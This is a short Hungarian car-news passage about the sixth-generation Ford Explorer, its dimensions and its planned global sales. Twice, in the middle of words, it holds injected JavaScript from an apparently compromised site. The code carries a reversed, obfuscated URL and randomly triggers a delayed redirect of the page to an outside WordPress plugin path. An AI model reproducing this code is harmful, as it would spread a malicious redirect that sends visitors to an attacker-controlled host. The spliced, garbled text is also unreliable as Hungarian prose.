1990 márciusában jelent meg a Ford Explorer első szériája, amely a Bronco II-t váltoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}totta és ma már a hatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}todik generációjánál jár. A legújabb Explorer európai szemmel egy igazi batár, hiszen több mint 5 méter hosszú, 2 méter széles és bő 3 méter a tengelytávja. Hazájában viszont ez csak a közepes méretű szabadidő-autónak számít. Lesz időnk barátkozni vele, mert a Ford igazi globális modellt csinál belőle. Ez annyit tesz, hogy a világon mindenütt árulják majd. Nem csak Amerikában, hanem az öreg kontinensen – így nálunk is – kapható lesz. Az Explorer ráadásul eljut a kínai vevőkhöz is, de az ő igényeiknek…
- Hirdetés -